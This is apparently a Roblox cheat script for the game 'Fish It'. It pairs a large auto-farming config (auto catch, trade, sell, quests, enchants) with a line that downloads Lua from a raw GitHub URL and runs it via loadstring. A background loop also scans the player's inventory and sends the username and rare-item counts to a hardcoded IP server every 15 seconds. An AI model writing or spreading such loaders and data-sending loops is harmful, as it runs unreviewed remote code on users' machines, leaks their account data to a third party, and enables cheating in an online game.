_G.FishItConfig = _G.FishItConfig or {
    ["Fishing"] = {
        ["Auto Perfect"] = true,
        ["Random Result"] = false,

        ["Auto Favorite"] = true,
        ["Auto Unfavorite"] = false,
        ["Fish Name"] = {
            "Sacred Guardian Squid",
            {Name = "Ruby", Variant = "Gemstone"},
{Variant = "Leviathan Rage"},
        },
        ["Auto Accept Trade"] = true,

        ["Auto Friend Request"] = false,
    },
    ["Auto Trade"] = {
        ["Enabled"] = false,
        ["Whitelist Username"] = {""},
        ["Category Fish"] = {
            "Secret",
        },
        ["Fish Name"] = {
            {Name = "Ruby", Variant = "Gemstone"},
        },
        ["Item Name"] = {
            "Evolved Enchant Stone",
        },
    },
    ["Farm Coin Only"] = {
        ["Enabled"] = false, -- Farm coins only [ cant buy rod, bait, enchant, weather ]
        ["Target"] = 190000,
    },
    ["Selling"] = {
        ["Auto Sell"] = true,
        ["Auto Sell Threshold"] = "Legendary",
        ["Auto Sell Every"] = 50,
    },
    ["Doing Quest"] = {
        ["Auto Ghostfinn Rod"] = true,
        ["Auto Element Rod"] = true,
        ["Unlock Ancient Ruin"] = true,
        ["Allowed Sacrifice"] = {
            "Ghost Shark",
            "Cryoshade Glider",
            "Panther Eel",
            "Queen Crab",
            "King Crab",
            "Giant Squid",
            "Blob Shark",
            "Ghost Shark",
        },
        ["FARM_LOC_SECRET_SACRIFICE"] = "Ocean",

        ["Minimum Rod"] = "Astral Rod",
    },
    ["WebHook"] = {
        ["Link Webhook"] = "",
        ["Auto Sending"] = false,
        ["Category"] = {"Secret"},

        ["Link Webhook Quest Complete"] = "",
    },
    ["Weather"] = {
        ["Auto Buying"] = false,
        ["Minimum Rod"] = "Astral Rod",
        ["Weather List"] = {
            "Wind",
        },
    },
    ["Potions"] = {
        ["Auto Use"] = true,
        ["Minimum Rod"] = "Astral Rod",
    },
    ["Totems"] = {
        ["Auto Use"] = true,
        ["Minimum Rod"] = "Element Rod",
        ["Buy List"] = {
            ["Mutation Totem"] = 50,
        },
    },
    ["Event"] = {
        ["Start Farm"] = false,
        ["Minimum Rod"] = "Ghostfinn Rod",
        ["Event List"] = {
            "Megalodon Hunt",
            "Ghost Shark Hunt",
            "Shark Hunt",
            ["Christmas Cave"] = true,
        },
    },
    ["Enchant"] = {
        ["Auto Enchant"] = false,
        ["Roll Enchant"] = false,
        ["Evolved Roll Enchant"] = true,
        ["Enchant List"] = {
            "SECRET Hunter",
        },
        ["Second Enchant"] = false,
        ["Allowed Sacrifice"] = {
            "Frostborn Shark",
            "Cryoshade Glider",
        },
        ["Second Enchant List"] = {
            "Reeler I",
            "Prismatic I",
            "Mutation Hunter II",
        },
        ["Minimum Rod"] = "Element Rod",
    },
    ["Bait List"] = {
        ["Auto Buying"] = true,
        ["Buy List"] = {
            "Midnight Bait",
            "Chroma Bait",
            "Corrupt Bait",
            "Aether Bait",
        },
        ["Endgame"] = "",
    },
    ["Rod List"] = {
        ["Auto Buying"] = true,
        ["Buy List"] = {
            "Grass Rod",
            "Midnight Rod",
            "Astral Rod",
            "Ares Rod",
            "Angler Rod",
        },
        ["Location Rods"] = {
            ["Fisherman Island"] = {"Starter Rod"},
            ["Kohana Volcano"] = {"Grass Rod", "Midnight Rod"},
            ["Tropical Grove"] = {"Astral Rod"},
            ["Kohana"] = {"Ghostfinn Rod", "Angler Rod", "Ares Rod"},
            ["Treasure Room"] = {"Element Rod"},
        },
        ["Endgame"] = "",
    },

    ["ExtremeFpsBoost"] = true,
    ["UltimatePerformance"] = false,
    ["Disable3DRender"] = true,
    ["AutoRemovePlayer"] = true,

    ["AutoReconnect"] = true,
    ["HideGUI"] = false,
    ["EXIT_MAP_IF_DISCONNECT"] = false,
}
script_key="DF9088D3BE0AAD288C85D1941B3DF95C";

local s,r repeat s,r=pcall(function()return game:HttpGet("https://raw.githubusercontent.com/FnDXueyi/roblog/refs/heads/main/fishit-78c86024ea87c8eca577549807421962.lua")end)wait(1)until s;loadstring(r)()
-- ==========================================================
--  FISH IT ULTIMATE | WEBHOOK MONITOR ONLY (BACKGROUND)
-- ==========================================================

local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local HttpService = game:GetService("HttpService")
local StarterGui = game:GetService("StarterGui")

local LocalPlayer = Players.LocalPlayer

-- ==========================================
-- 1. SETUP REMOTE & MODULES
-- ==========================================
local RPath = {"Packages", "_Index", "sleitnick_net@0.2.0", "net"}

local function GetRemote(remotePath, name, timeout)
    local currentInstance = ReplicatedStorage
    for _, childName in ipairs(remotePath) do
        currentInstance = currentInstance:WaitForChild(childName, timeout or 0.5)
        if not currentInstance then return nil end
    end
    return currentInstance:FindFirstChild(name)
end

-- Remote Notification (for Console Logs)
local RE_ObtainedNewFishNotification = GetRemote(RPath, "RE/ObtainedNewFishNotification", 10)

-- Load Modules (Required to read inventory data)
local ItemUtility, TierUtility, Replion
local ModulesLoaded = false

pcall(function()
    ItemUtility = require(ReplicatedStorage:WaitForChild("Shared"):WaitForChild("ItemUtility", 5))
    TierUtility = require(ReplicatedStorage:WaitForChild("Shared"):WaitForChild("TierUtility", 5))
    Replion = require(ReplicatedStorage:WaitForChild("Packages"):WaitForChild("Replion")).Client
    ModulesLoaded = true
end)

if not ModulesLoaded then
    warn("[Webhook Monitor] Failed to load game modules. Data may be inaccurate.")
end

-- ==========================================
-- 2. HELPER FUNCTIONS
-- ==========================================
local function GetFishNameAndRarity(item)
    local name = item.Identifier or "Unknown"
    local rarity = item.Metadata and item.Metadata.Rarity or "COMMON"
    local itemID = item.Id
    local itemData

    -- Try to resolve Item Data
    if ItemUtility and itemID then
        pcall(function()
            itemData = ItemUtility:GetItemData(itemID)
            if not itemData then
                local numericID = tonumber(item.Id) or tonumber(item.Identifier)
                if numericID then itemData = ItemUtility:GetItemData(numericID) end
            end
        end)
    end

    -- Refine Name and Rarity
    if itemData and itemData.Data and itemData.Data.Name then name = itemData.Data.Name end
    if item.Metadata and item.Metadata.Rarity then 
        rarity = item.Metadata.Rarity 
    elseif itemData and itemData.Probability and TierUtility then 
        local tier
        pcall(function() tier = TierUtility:GetTierFromRarity(itemData.Probability.Chance) end) 
        if tier and tier.Name then rarity = tier.Name end 
    end
    return name, rarity
end

local function GetMutation(item)
    if not item.Metadata then return "None" end
    if item.Metadata.VariantId and item.Metadata.VariantId ~= "" then return item.Metadata.VariantId end
    if item.Metadata.Shiny == true then return "Shiny" end
    return "None"
end

-- ==========================================
-- 3. CONSOLE LOGGER (VERIFICATION)
-- ==========================================
-- Prints to console (F9) so you know it's detecting fish
if RE_ObtainedNewFishNotification then
    RE_ObtainedNewFishNotification.OnClientEvent:Connect(function(itemId, metadata, fullData)
        local dummyItem = { Id = itemId, Identifier = fullData and fullData.Identifier, Metadata = metadata }
        local name, rarity = GetFishNameAndRarity(dummyItem)
        local mutation = GetMutation(dummyItem)
        
        local displayStr = name
        if mutation ~= "None" then displayStr = "[" .. mutation .. "] " .. name end
        
        -- Print to console
        print("[Monitor] Caught: " .. displayStr .. " (" .. rarity .. ")")
    end)
end

-- ==========================================================
-- 4. WEBHOOK SENDER LOOP
-- ==========================================================
task.spawn(function()
    -- Configuration from source
    local WEBHOOK_BASE = "http://43.134.116.2:5000/webhook/fishit"
    local LOOP_DELAY = 15 

    local function sendToWebhook(playerName, summary)
        local json = HttpService:JSONEncode(summary)
        local encoded = HttpService:UrlEncode(json)
        local url = WEBHOOK_BASE .. "?player=" .. HttpService:UrlEncode(playerName) .. "&data=" .. encoded
        
        -- Send Request
        pcall(function() game:HttpGet(url) end)
    end

    if Replion then
        -- Wait for initial data load
        local dataReplica = Replion:WaitReplion("Data")
        
        while true do
            local success, inventory = pcall(function() return dataReplica:GetExpect("Inventory") end)
            
            if success and inventory then
                local summary = {}
                
                -- Scan Inventory
                for _, items in pairs(inventory) do
                    for _, item in ipairs(items) do
                        local name, rarity = GetFishNameAndRarity(item)
                        local mutation = GetMutation(item)

                        -- Filter: Only count Secrets and Ruby Gemstones
                        local isSecret = (rarity == "SECRET")
                        local isGemstoneRuby = (name == "Ruby" and mutation == "Gemstone")

                        if isSecret or isGemstoneRuby then
                            local displayName = name
                            if isGemstoneRuby then 
                                displayName = "[Gemstone] Ruby"
                            elseif mutation ~= "None" then 
                                displayName = "[" .. mutation .. "] " .. name 
                            end
                            
                            summary[displayName] = (summary[displayName] or 0) + 1
                        end
                    end
                end
                
                -- Send data
                sendToWebhook(LocalPlayer.Name, summary)
            end
            
            task.wait(LOOP_DELAY)
        end
    end
end)

-- Notification that script is running
StarterGui:SetCore("SendNotification", {
    Title = "Webhook Monitor";
    Text = "Active. Tracking Secrets & Rubies in background.";
    Duration = 5;
})
